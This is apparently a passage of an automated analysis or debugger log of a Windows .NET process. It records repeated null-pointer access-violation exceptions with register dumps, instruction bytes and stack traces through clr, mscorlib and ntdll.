DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x73fbcf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 60 49 a5 6b 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c1d1
registers.esp: 83358152
registers.edi: 83358216
registers.eax: 0
registers.ebp: 83358224
registers.edx: 48442484
registers.ebx: 47096196
registers.esi: 47652464
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e167ee
0x5e165ef
0x5e1cf1f
0x5e1cece
mscorlib+0x32de48 @ 0x7192de48
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x32dd91 @ 0x7192dd91
mscorlib+0x32dc4c @ 0x7192dc4c
mscorlib+0x32db05 @ 0x7192db05
mscorlib+0x32d9c8 @ 0x7192d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x73fbd2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x73fbd281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x73fbd1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x73fbcf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 ed 48 a5 6b 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c244
registers.esp: 83353756
registers.edi: 83358216
registers.eax: 0
registers.ebp: 83358224
registers.edx: 48442484
registers.ebx: 47096196
registers.esi: 47652464
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e16811
0x5e165ef
0x5e1cf1f
0x5e1cece
mscorlib+0x32de48 @ 0x7192de48
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x32dd91 @ 0x7192dd91
mscorlib+0x32dc4c @ 0x7192dc4c
mscorlib+0x32db05 @ 0x7192db05
mscorlib+0x32d9c8 @ 0x7192d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x73fbd2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x73fbd281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x73fbd1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x73fbcf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 20 48 a5 6b 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c311
registers.esp: 83358152
registers.edi: 83358216
registers.eax: 0
registers.ebp: 83358224
registers.edx: 48443308
registers.ebx: 47096196
registers.esi: 47652464
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e16811
0x5e165ef
0x5e1cf1f
0x5e1cece
mscorlib+0x32de48 @ 0x7192de48
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x32dd91 @ 0x7192dd91
mscorlib+0x32dc4c @ 0x7192dc4c
mscorlib+0x32db05 @ 0x7192db05
mscorlib+0x32d9c8 @ 0x7192d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x73fbd2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x73fbd281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x73fbd1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x73fbcf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 ad 47 a5 6b 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c384
registers.esp: 83353756
registers.edi: 83358216
registers.eax: 0
registers.ebp: 83358224
registers.edx: 48443308
registers.ebx: 47096196
registers.esi: 47652464
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e1c43d
0x5e16834
0x5e165ef
0x5e1cf1f
0x5e1cece
mscorlib+0x32de48 @ 0x7192de48
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x32dd91 @ 0x7192dd91
mscorlib+0x32dc4c @ 0x7192dc4c
mscorlib+0x32db05 @ 0x7192db05
mscorlib+0x32d9c8 @ 0x7192d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x73fbd2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x73fbd281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x73fbd1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x73fbcf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 20 48 a5 6b 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c311
registers.esp: 83358036
registers.edi: 83358100
registers.eax: 0
registers.ebp: 83358108
registers.edx: 48443308
registers.ebx: 47096196
registers.esi: 47652464
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e1c43d
0x5e16834
0x5e165ef
0x5e1cf1f
0x5e1cece
mscorlib+0x32de48 @ 0x7192de48
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x32dd91 @ 0x7192dd91
mscorlib+0x32dc4c @ 0x7192dc4c
mscorlib+0x32db05 @ 0x7192db05
mscorlib+0x32d9c8 @ 0x7192d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x73fbd2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x73fbd281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x73fbd1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x73fbcf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 ad 47 a5 6b 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c384
registers.esp: 83353636
registers.edi: 83358100
registers.eax: 0
registers.ebp: 83358108
registers.edx: 48443308
registers.ebx: 47096196
registers.esi: 47652464
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e1c44b
0x5e16834
0x5e165ef
0x5e1cf1f
0x5e1cece
mscorlib+0x32de48 @ 0x7192de48
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x32dd91 @ 0x7192dd91
mscorlib+0x32dc4c @ 0x7192dc4c
mscorlib+0x32db05 @ 0x7192db05
mscorlib+0x32d9c8 @ 0x7192d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x73fbd2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x73fbd281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x73fbd1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x73fbcf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 a0 4a a5 6b 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c091
registers.esp: 83358036
registers.edi: 83358100
registers.eax: 0
registers.ebp: 83358108
registers.edx: 48036084
registers.ebx: 47096196
registers.esi: 47652464
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e1c44b
0x5e16834
0x5e165ef
0x5e1cf1f
0x5e1cece
mscorlib+0x32de48 @ 0x7192de48
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x32dd91 @ 0x7192dd91
mscorlib+0x32dc4c @ 0x7192dc4c
mscorlib+0x32db05 @ 0x7192db05
mscorlib+0x32d9c8 @ 0x7192d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x73fbd2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x73fbd281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x73fbd1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x73fbcf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 2d 4a a5 6b 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c104
registers.esp: 83353636
registers.edi: 83358100
registers.eax: 0
registers.ebp: 83358108
registers.edx: 48036084
registers.ebx: 47096196
registers.esi: 47652464
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e1c675
0x5e16857
0x5e165ef
0x5e1cf1f
0x5e1cece
mscorlib+0x32de48 @ 0x7192de48
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x32dd91 @ 0x7192dd91
mscorlib+0x32dc4c @ 0x7192dc4c
mscorlib+0x32db05 @ 0x7192db05
mscorlib+0x32d9c8 @ 0x7192d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x73fbd2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x73fbd281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x73fbd1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x73fbcf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 a0 4a a5 6b 89 45 c8 83 7d c8 00 74 1f
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c091
registers.esp: 83358056
registers.edi: 83358120
registers.eax: 0
registers.ebp: 83358128
registers.edx: 48036084
registers.ebx: 47096196
registers.esi: 47652464
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x5e1c675
0x5e16857
0x5e165ef
0x5e1cf1f
0x5e1cece
mscorlib+0x32de48 @ 0x7192de48
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x32dd91 @ 0x7192dd91
mscorlib+0x32dc4c @ 0x7192dc4c
mscorlib+0x32db05 @ 0x7192db05
mscorlib+0x32d9c8 @ 0x7192d9c8
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4825c CorDllMainForThunk-0x4429f clr+0x10d2d5 @ 0x73fbd2d5
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x48208 CorDllMainForThunk-0x442f3 clr+0x10d281 @ 0x73fbd281
DllGetClassObjectInternal+0x48159 CorDllMainForThunk-0x443a2 clr+0x10d1d2 @ 0x73fbd1d2
DllGetClassObjectInternal+0x47f09 CorDllMainForThunk-0x445f2 clr+0x10cf82 @ 0x73fbcf82
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 2d 4a a5 6b 89 45 bc 8b 55 bc b9 b0 af
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x5e1c104
registers.esp: 83353660
registers.edi: 83358120
registers.eax: 0
registers.ebp: 83358128
registers.edx: 48036084
registers.ebx: 47096196
registers.esi: 47652464
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6869f8f
mscorlib+0xd14496 @ 0x72314496
0x6866eaf
0x6860b91
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d3711 @ 0x718d3711
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x6860825
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2abe6 @ 0x7202abe6
mscorlib+0xa2c940 @ 0x7202c940
mscorlib+0xa2ca0e @ 0x7202ca0e
0x686022e
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
DllGetClassObjectInternal+0x4a0eb CorDllMainForThunk-0x42410 clr+0x10f164 @ 0x73fbf164
DllGetClassObjectInternal+0x2a4d4 CorDllMainForThunk-0x62027 clr+0xef54d @ 0x73f9f54d
DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x73fca0cf
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 39 09 e8 7a 43 00 6b 8b f8 e9 2c fd ff ff 89 7d
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x686c7a7
registers.esp: 88140016
registers.edi: 88140060
registers.eax: 46120984
registers.ebp: 88140076
registers.edx: 46120984
registers.ebx: 3
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x6869f8f
mscorlib+0xd14496 @ 0x72314496
0x6866eaf
0x6860b91
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73eb2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x73f31838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x73f31737
mscorlib+0x2d3711 @ 0x718d3711
mscorlib+0x308f2d @ 0x71908f2d
mscorlib+0x2cb060 @ 0x718cb060
0x6860825
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x382cf2 @ 0x71982cf2
mscorlib+0x34c5a2 @ 0x7194c5a2
mscorlib+0xd4c6a0 @ 0x7234c6a0
mscorlib+0xa2abe6 @ 0x7202abe6
mscorlib+0xa2c940 @ 0x7202c940
mscorlib+0xa2ca0e @ 0x7202ca0e
0x686022e
mscorlib+0x34b4fd @ 0x7194b4fd
mscorlib+0x34b466 @ 0x7194b466
mscorlib+0x34b429 @ 0x7194b429
mscorlib+0x3022a6 @ 0x719022a6
mscorlib+0x34b2d2 @ 0x7194b2d2
mscorlib+0x34b1f7 @ 0x7194b1f7
mscorlib+0x34b13b @ 0x7194b13b
mscorlib+0x30d3a5 @ 0x7190d3a5
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73ec264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73ec2e95
DllGetClassObjectInternal+0x4a153 CorDllMainForThunk-0x423a8 clr+0x10f1cc @ 0x73fbf1cc
LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f27d4d
LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f27dbb
LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f27e88
DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73ebc3bf
